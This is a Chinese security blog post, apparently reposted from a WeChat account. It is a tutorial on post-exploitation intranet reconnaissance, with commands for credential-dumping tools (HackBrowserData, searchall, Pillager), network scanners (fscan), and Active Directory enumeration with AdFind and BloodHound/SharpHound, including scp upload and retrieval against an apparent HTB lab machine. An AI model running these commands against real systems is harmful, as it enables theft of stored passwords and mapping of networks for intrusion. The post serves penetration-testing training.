初探内网【信息收集】

admin 2025年4月6日18:59:42评论23 views字数 2374阅读7分54秒阅读模式

下面所用的软件我已放在网盘

链接:https://pan.quark.cn/s/2a9e2b6f7471

也可以直接在公众号夜风Sec内回复信息收集获取

针对本机的信息收集

内网:各种角色( 个人用机、web服务、数据库服务器 )

针对内网个人用机的角色较多 -> 账号密码存储

  • 浏览器自动存储、
  • 自己创建文件记录
  • 某些工具自动存储

1、HackBrowserData 快速获取浏览器的账户密码

  • 安装

Github项目地址:https://github.com/moonD4rk/HackBrowserData

  • 基本使用
.hack-browser-data.exe # 可以是管理员身份运行.hack-browser-data.exe -b all -f json --dir results --zip # 以json格式输出结果, 并压缩为zip
初探内网【信息收集】
4-4-00
初探内网【信息收集】
4-4-01

2、searchall 快速搜索服务器中有关敏感信息和浏览器的账户密码

  • 安装

Github项目地址:https://github.com/Naturehi666/searchall

  • 基本使用

使用手册:https://github.com/Naturehi666/searchall/blob/main3.5.6/%E4%BD%BF%E7%94%A8%E8%AF%B4%E6%98%8E.md

.searchall64.exe search -p <指定路径>.searchall64.exe browser -b all # 对全部浏览器进行搜索 最好是管理员身份运行
初探内网【信息收集】
4-4-02

3、Pillager 后渗透期间的信息收集工具,可以收集目标机器上的敏感信息

初探内网【信息收集】
4-4-03
  • 安装

Github项目地址:https://github.com/qwqdanchun/Pillager

  • 使用
# 很强大 很自动化 直接运行即可.Pillager.exe

结果位于%Temp%Pillager.zip

初探内网【信息收集】
4-4-04

对外打点扫描类

1、Fscan 内网综合扫描工具,方便一键自动化、全方位漏扫扫描

  • 安装

Github项目地址:https://github.com/shadow1ng/fscan

  • 基本使用
fscan.exe -h 192.168.47.0/24 # 默认使用全部模块
初探内网【信息收集】
4-4-05

2、Template 启发式内网扫描

  • 安装

Github项目地址:https://github.com/1n7erface/Template

  • 基本使用
.App-amd64-noupx.exe -i 192.168.47.0/24 
初探内网【信息收集】
4-4-06

AD域环境分析类

1、Adfind 在域环境下非常强大的信息搜集工具

使用手册

  • 安装

官网地址:https://www.joeware.net/freetools/tools/adfind/

  • 域控查询:
Adfind.exe -sc dclistAdfind.exe -schema -s base objectversion
  • 域用户查询
Adfind.exe -users nameAdfind.exe -sc u:webadmin
  • 域用户组查询
Adfind.exe -f "objectClass=group"Adfind.exe -f "objectClass=group" -dn
  • 查询域中计算机信息
Adfind.exe -f "objectClass=computer"Adfind.exe -f "objectClass=computer" dn
  • 查询所有GPO
Adfind.exe -sc gpodmp

2、BloodHound 可视化图形分析域环境中的关系的工具

  • 安装

HloodHound项目地址:https://github.com/SpecterOps/BloodHound-Legacy/releases

SharpHound项目地址:https://github.com/SpecterOps/SharpHound/releases

# neo4jsudo apt-get install neo4j# 启动sudo neo4j start# 第一次使用需要设置一下账号密码 默认是 neo4j neo4jhttp://localhost:7474 # 访问该网址进行设置# 然后就是下载bloodhound 安装 -> 跟下面这个网址走就行https://bloodhound.specterops.io/get-started/quickstart/community-edition-quickstart# 下载 SharpHound.exe 收集工具.SharpHound.exe -c All --OutputDirectory C:Temp # 被控机上运行 -> 生成zip文件# 上传 SharpHound.exe 到目标机器 scp命令scp -o GSSAPIAuthentication=yes ~/桌面/privilege/bloodhoundcollect/SharpHound.exe [email protected]:C:/Users/f.frizzle/Desktop# 得到zip结果之后回传回来scp [email protected]:C:/Temp/20250405190945_BloodHound.zip /home/yefeng/桌面/HTB/TheFrizz# 启动bloodhound -> 导入zip文件 -> 分析./bloodhound
初探内网【信息收集】
4-4-07

注意:

SharpHound 和 BloodHound 的版本要相互兼容

我提供的安装包是 SharpHound3 BloodHound4.0.3 彼此是兼容的

注意: 本文仅用于网络安全知识的学习与交流,应严格遵守相关法律法规和道德准则,不得用于非法入侵、破坏、窃取信息等任何违法违规行为。因使用本文内容而导致的任何直接或间接的损失,我均不承担任何责任。

原文始发于微信公众号(夜风Sec):初探内网【信息收集】

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月6日18:59:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   初探内网【信息收集】https://cn-sec.com/archives/3920993.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息